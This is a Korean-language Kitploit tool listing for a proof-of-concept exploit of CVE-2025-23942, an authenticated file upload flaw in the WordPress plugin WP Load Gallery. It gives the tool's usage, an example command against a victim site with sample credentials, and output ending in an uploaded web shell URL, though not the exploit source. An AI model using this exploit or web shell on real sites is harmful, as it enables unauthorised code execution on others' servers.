Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-23942-poc — WP Load Gallery <= 2.1.6 - 인증된 (작성자 권한 이상) 임의 파일 업로드 | Kitploit
도구/GitHubGitHub/nxploited/cve-2025-23942-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubnxploited/cve-2025-23942-poc

CVE-2025-23942-poc

WP Load Gallery <= 2.1.6 - 인증된 (작성자 권한 이상) 임의 파일 업로드

저장소 보기
321년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

WP Load Gallery 익스플로잇 (CVE-2025-23942)

📌 설명

NgocCode WP Load Gallery에서 위험한 유형의 파일 무제한 업로드 취약점으로 인해 웹 서버에 웹 셸을 업로드할 수 있습니다. 이 문제는 WP Load Gallery 버전 n/a부터 2.1.6까지 영향을 미칩니다.

⚠️ 취약점 세부 정보

  • CVE ID: CVE-2025-23942
  • 영향을 받는 플러그인: WP Load Gallery
  • 영향을 받는 버전: 2.1.6까지
  • 취약점 유형: 무제한 파일 업로드 (Unrestricted File Upload)
  • 심각도: 치명적 (CVSS 9.1)
  • 공격 벡터: 인증된 (작성자 이상) 원격 코드 실행 (RCE)
  • 패치 가능 여부: ❌ (아직 공식 패치 없음)

🚀 익스플로잇 기능

✅ 자동화된 공격 – nonce 추출, 로그인 및 셸 업로드 자동 수행.
✅ 버전 확인 – 공격 전 대상이 취약한지 확인.
✅ 오류 처리 – 실패 시에도 원활한 실행 보장.
✅ 세션 처리 – 인증을 위한 지속적인 세션 관리 사용.
✅ 실시간 피드백 – 각 단계별 출력 제공.

🛠️ 요구 사항

  • Python 3.x
  • requests 모듈 (pip install requests)
  • 대상 시스템에 유효한 WordPress 작성자 이상 계정

🔥 사용법

필요한 매개변수와 함께 스크립트 실행:

root@kitploit:~
usage: CVE-2025-23942.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit WP Load Gallery - Arbitrary File Upload

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., https://example.com)
  -un USERNAME, --username USERNAME
                        WordPress Username
  -p PASSWORD, --password PASSWORD
                        WordPress Password

예시:

root@kitploit:~
python CVE-2025-23942.py -u http://victim-site.com -un author_user -p password123

📝 출력 예시

root@kitploit:~
   _______      ________    ___   ___ ___  _____     ___  ____   ___  _  _ ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|   |__ \|___ \ / _ \| || |__ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ ) | __) | (_) | || |_ ) |
 | |      \ \/ / |  __|______/ /| | | |/ /|___ \______/ / |__ < \__, |__   _/ / 
 | |____   \  /  | |____    / /_| |_| / /_ ___) |    / /_ ___) |  / /   | |/ /_ 
  \_____|   \/   |______|  |____|\___/____|____/    |____|____/  /_/    |_|____|

[+] Checking plugin version...
[+] Detected version: 2.1.6
[+] The target is vulnerable! Proceeding with exploitation...
[+] Logged in successfully.
[+] Extracting wplg_nonce...
[+] Extracted wplg_nonce: a1b2c3d4e5
[+] Uploading shell...
[+] File uploaded successfully!
[+] Shell is accessible at: http://victim-site.com/wp-content/uploads/2025/02/nxploit.php?cmd=id

📜 법적 고지

이 익스플로잇은 교육 및 보안 연구 목적으로만 사용됩니다. 소유한 시스템이나 명시적 테스트 허가를 받은 시스템이 아닌 곳에서는 사용하지 마십시오. 작성자는 이 스크립트의 오용에 대해 책임을 지지 않습니다. ( Khaled_alenazi )

도구 다운로드